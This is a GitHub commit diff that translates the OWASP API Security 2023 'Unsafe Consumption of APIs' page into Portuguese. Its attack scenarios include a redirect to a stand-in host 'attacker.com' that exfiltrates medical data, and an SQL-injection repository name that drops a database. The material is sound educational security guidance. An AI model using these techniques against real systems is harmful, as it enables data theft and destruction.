Skip to content

Commit 1e2674b

Browse files
authored
Update 0xaa-unsafe-consumption-of-apis.md
1 parent 7c80945 commit 1e2674b

File tree

1 file changed

+24
-23
lines changed

1 file changed

+24
-23
lines changed

editions/2023/pt-pt/0xaa-unsafe-consumption-of-apis.md

Lines changed: 24 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -26,23 +26,24 @@ A API pode estar vulnerável se:
2626
## Exemplos de Cenários de Ataque
2727

2828
### Cenário #1
29-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
30-
An API relies on a third-party service to enrich user provided business
31-
addresses. When an address is supplied to the API by the end user, it is sent
32-
to the third-party service and the returned data is then stored on a local
33-
SQL-enabled database.
3429

35-
Bad actors use the third-party service to store an SQLi payload associated with
36-
a business created by them. Then they go after the vulnerable API providing
37-
specific input that makes it pull their "malicious business" from the
38-
third-party service. The SQLi payload ends up being executed by the database,
39-
exfiltrating data to an attacker's controlled server.
30+
Uma API depende de um serviço de terceiros para enriquecer os endereços
31+
comerciais fornecidos pelos utilizadores. Quando um endereço é fornecido pelo
32+
utilizador final à API, ele é enviado para o serviço de terceiros e os dados
33+
retornados são então armazenados numa base de dados local compatível com SQL.
34+
35+
Atacantes utilizam o serviço de terceiros para armazenar um conteúdo malicioso
36+
de injeção SQL (SQLi) associado a um negócio criado por eles. Em seguida, visam
37+
a API vulnerável fornecendo um conteúdo específico que faz com que esta obtenha
38+
o "negócio malicioso" do serviço de terceiros. O conteúdo de SQLi acaba por ser
39+
executado pela base de dados, exfiltrando dados para um servidor controlado pelo
40+
atacante.
4041

4142
### Cenário #2
4243

43-
An API integrates with a third-party service provider to safely store sensitive
44-
user medical information. Data is sent over a secure connection using an HTTP
45-
request like the one below:
44+
Uma API integra-se com um fornecedor de serviços de terceiros para armazenar com
45+
segurança informações médicas sensíveis dos utilizadores. Os dados são enviados
46+
através de uma conexão segura usando um pedido HTTP como o abaixo:
4647

4748
```
4849
POST /user/store_phr_record
@@ -51,28 +52,28 @@ POST /user/store_phr_record
5152
}
5253
```
5354

54-
Bad actors found a way to compromise the third-party API and it starts
55-
responding with a `308 Permanent Redirect` to requests like the previous one.
55+
Atacantes encontraram uma forma de comprometer a API de terceiros, que começa a
56+
responder com um `308 Permanent Redirect` a pedidos como o anterior.
5657

5758
```
5859
HTTP/1.1 308 Permanent Redirect
5960
Location: https://attacker.com/
6061
```
6162

62-
Since the API blindly follows the third-party redirects, it will repeat the
63-
exact same request including the user's sensitive data, but this time to the
64-
attacker's server.
63+
Como a API segue cegamente os redirecionamentos do terceiro, ela repetirá
64+
exatamente o mesmo pedido, incluindo os dados sensíveis do utilizador, mas desta
65+
vez para o servidor do atacante.
6566

6667
### Cenário #3
6768

68-
An attacker can prepare a git repository named `'; drop db;--`.
69+
Um atacante pode preparar um repositório git chamado `'; drop db;--`.
6970

70-
Now, when an integration from an attacked application is done with the
71-
malicious repository, SQL injection payload is used on an application that
72-
builds an SQL query believing the repository's name is safe input.
71+
Agora, quando uma integração de uma aplicação atacada é feita com o repositório
72+
malicioso, uma carga de injeção SQL é utilizada numa aplicação que constrói uma
73+
consulta SQL, acreditando que o nome do repositório é um conteúdo seguro.
7374

7475
## Como Prevenir
75-
76+
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
7677
* When evaluating service providers, assess their API security posture.
7778
* Ensure all API interactions happen over a secure communication channel (TLS).
7879
* Always validate and properly sanitize data received from integrated APIs

0 commit comments

Comments
 (0)